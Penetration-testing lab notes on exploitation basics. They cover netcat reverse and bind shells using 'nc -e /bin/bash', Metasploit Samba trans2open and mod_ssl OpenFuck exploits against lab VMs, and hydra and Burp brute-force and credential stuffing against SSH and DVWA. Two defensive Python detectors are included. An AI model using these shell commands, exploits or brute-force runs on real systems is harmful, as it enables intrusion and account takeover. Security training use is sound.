# Exploitation Basics

## Reverse shell vs Bind shell

### netcat

➡️ [netcat](https://netcat.sourceforge.net/)

**Reverse shell** - the victim/target connects back to the attacker

* Attack machine - **listens** on a port
* Target machine - connects to the attacker machine's listening port

![Netcat Reverse Shell - hackingtutorials.org](/files/DUJKtxXxYs3bPWgZczad)

```bash
# Attacker
nc -nvlp 4444

# Target
nc 192.168.31.131 4444 -e /bin/bash
```

![Reverse shell](/files/R9FpnZS4YDM56BURnWWL)

**Bind shell** - the attacker opens a port on the target (via exploitation) and connects to it

* Attack machine - exploits the target, opens a listening port on it and connects to that port
* Target machine - listens for the attacker's connection

![Netcat Bind Shell - hackingtutorials.org](/files/wa9nEViFUpQlPEb8iQQy)

* Especially used on external assessments

```bash
# Target
nc -nvlp 4444 -e /bin/bash

# Attacker
nc 192.168.31.131 4444
```

![Bind shell](/files/D3XGzjzCuU3vXyomZC9y)
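Whichever side initiates the connection, both `nc -e /bin/bash` variants above leave the target with a shell whose standard streams are a socket, which is what a defender can look for. This is an added example, not part of the original notes: it walks a Linux-style `/proc` tree (a constructed fake one here, so it runs offline) and flags shells whose fd 0, 1 or 2 is a socket.

```python
"""Spot shell processes whose standard streams are network sockets.
Reverse and bind shell alike leave the target with a /bin/bash whose
stdin/stdout/stderr are a TCP socket, whichever side dialled. Added
defender-side example, not part of the original notes; Linux /proc layout,
fake tree constructed below for the demo."""
import os
import re
import tempfile

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")


def socket_backed_shells(proc_root="/proc"):
    """Return sorted (pid, comm) for shells whose fd 0, 1 or 2 is a socket."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid_dir = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(pid_dir, "comm")) as f:
                comm = f.read().strip()
            if comm not in SHELLS:
                continue
            # An interactive shell has a pty or pipe here, never a socket.
            fds = [os.readlink(os.path.join(pid_dir, "fd", str(n))) for n in range(3)]
        except OSError:
            continue  # process exited, or not ours to inspect
        if any(SOCKET_LINK.match(fd) for fd in fds):
            hits.append((int(entry), comm))
    return sorted(hits)


def build_fake_proc():
    """Constructed /proc look-alike: 101 is a normal bash, 202 is nc -e style."""
    root = tempfile.mkdtemp()
    for pid, comm, target in [(101, "bash", "/dev/pts/0"),
                              (202, "bash", "socket:[38421]"),
                              (303, "nc", "socket:[38421]")]:
        fd_dir = os.path.join(root, str(pid), "fd")
        os.makedirs(fd_dir)
        with open(os.path.join(root, str(pid), "comm"), "w") as f:
            f.write(comm + "\n")
        for n in range(3):  # stdin, stdout, stderr all point at the same target
            os.symlink(target, os.path.join(fd_dir, str(n)))
    return root

if __name__ == "__main__":
    print(socket_backed_shells(build_fake_proc()))  # [(202, 'bash')]
```

Run it with the default `proc_root` on a live host to check the real process table; pid 303 shows that the `nc` parent itself is not reported, only the shell it spawned.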

***

## Staged vs Non-Staged payloads

**Non-Staged payload** - sends the exploit shellcode all at once; larger in size and won't always work

* Metasploit e.g. `payload/windows/meterpreter_reverse_tcp`

**Staged payload** - sends the payload in stages; less stable

* Metasploit e.g. `payload/windows/meterpreter/reverse_tcp`

***

## Metasploit (SMB attack)

```bash
searchsploit samba 2.2
```

![searchsploit samba 2.2](/files/xJrCgztnbpRwtFzVp3O7)

```bash
# Run Metasploit
msfconsole

search trans2open
use exploit/linux/samba/trans2open
options

set RHOSTS 192.168.31.130
show targets

run
```

* This does not work, since it is using the `linux/x86/meterpreter/reverse_tcp` staged payload.
* Try another payload:

```bash
set payload linux/x86/shell_reverse_tcp
run
```

![root on Kioptrix VM](/files/ux1ydClEMJH8oi0sFAs1)

* Gained reverse shell via Metasploit

***

## Manual exploitation

Use [OpenLuck](https://github.com/heltonWernik/OpenLuck) to exploit [CVE-2002-0082](https://nvd.nist.gov/vuln/detail/CVE-2002-0082) - [Apache mod\_ssl < 2.8.7 OpenSSL - Remote Buffer Overflow](https://nvd.nist.gov/vuln/detail/CVE-2002-0082)

* Follow the usage instructions to compile the exploit and run it against the target machine

```bash
git clone https://github.com/heltonWernik/OpenFuck.git
sudo apt-get install libssl-dev
gcc -o OpenFuck OpenFuck.c -lcrypto

# Run without arguments to print the usage and the list of target offsets
./OpenFuck

# Pick the offset matching the target's Apache 1.3.20 build from that list
# Usage: ./OpenFuck target box [port] [-c N]
```

```bash
./OpenFuck 0x6b 192.168.31.130 -c 40
```

![](/files/x1lui81CbJhuy8h9tR6R)

***

## Brute force attacks

* Brute-force attack `SSH` with weak/default credentials

### hydra

➡️ [hydra](https://github.com/vanhauser-thc/thc-hydra)

```bash
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.31.130 -t 4 -V
```

* Use the same with Metasploit

```bash
msfconsole

search ssh_login
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.31.130
set USERNAME root
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
set THREADS 10
set VERBOSE true
run
```
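Both the hydra run and the Metasploit `ssh_login` scanner above leave the same trace on the target: a burst of `Failed password` entries for one account from one source. As an added defender-side example (not part of the notes), this parses syslog-style `sshd` lines and flags sources that exceed a failure threshold inside a sliding window; the log lines are constructed and the 60 s / 5-failure threshold is an assumption.

```python
"""Flag SSH brute-force bursts in sshd log lines.
hydra -t 4 and Metasploit's ssh_login (THREADS 10) above leave the same
footprint on the target: many "Failed password" records for one account from
one source within seconds. Added defender-side example, not from the notes;
the log lines are constructed and the 60 s / 5-failure threshold is an assumption."""
import re
from collections import defaultdict
from datetime import datetime

# Classic syslog-format sshd line as found in Debian's /var/log/auth.log
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def brute_force_sources(lines, window_s=60, threshold=5, year=2024):
    """Return {ip: set(users)} for sources with >= threshold failures inside window_s."""
    failures = defaultdict(list)  # ip -> [(time, user), ...]
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # accepted logins, disconnects and other noise
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        failures[m["ip"]].append((ts, m["user"]))
    flagged = {}
    for ip, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):  # sliding window over this source's failures
            while (events[end][0] - events[start][0]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = {user for _, user in events}
                break
    return flagged


SAMPLE_LOG = [  # constructed: 10.0.0.5 mimics hydra -l root; 10.0.0.9 is one typo
    "Mar 14 10:02:01 target sshd[2101]: Failed password for root from 10.0.0.5 port 51234 ssh2",
    "Mar 14 10:02:01 target sshd[2102]: Failed password for root from 10.0.0.5 port 51235 ssh2",
    "Mar 14 10:02:02 target sshd[2103]: Failed password for root from 10.0.0.5 port 51236 ssh2",
    "Mar 14 10:02:02 target sshd[2104]: Failed password for root from 10.0.0.5 port 51237 ssh2",
    "Mar 14 10:02:03 target sshd[2105]: Failed password for invalid user admin from 10.0.0.5 port 51238 ssh2",
    "Mar 14 10:02:10 target sshd[2106]: Accepted password for alice from 10.0.0.9 port 40000 ssh2",
    "Mar 14 10:05:44 target sshd[2107]: Failed password for alice from 10.0.0.9 port 40001 ssh2",
]

if __name__ == "__main__":
    print(brute_force_sources(SAMPLE_LOG))  # {'10.0.0.5': {'root', 'admin'}}
```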

***

## Credential stuffing and Password spraying

[**Credential stuffing**](https://owasp.org/www-community/attacks/Credential_stuffing) - injecting breached account credentials (from leaks, etc.) in hopes of account takeover

[**Password spraying**](https://owasp.org/www-community/attacks/Password_Spraying_Attack) - trying default passwords against a list of usernames

```bash
ls -lah /usr/share/seclists/Passwords/Leaked-Databases/
```

* Set up FoxyProxy in the browser and start BurpSuite.
* Use a local vulnerable webapp like [dvwa](https://github.com/digininja/DVWA)

```bash
sudo apt install dvwa

dvwa-start
```

* Open the login page - <http://127.0.0.1:42001/vulnerabilities/brute/>

**BurpSuite**

* Turn intercept ON and send the login request to intruder
* Highlight the username and password values, and add them to the payload positions
* Attack type - `Pitchfork`

![](/files/sbzyFfFLfLUZbQmKeHfM)

* **Payloads**
  * for each payload set, paste the username list and the password list respectively
  * Start the attack
    * look for changes in the response Status and Length

![](/files/5njusedcYO2VoVcSp9M2)

![](/files/bEfwtpIFD4Fog2tKxtSi)

![](/files/v14tZO7P0zqZUHt53ij3)

***
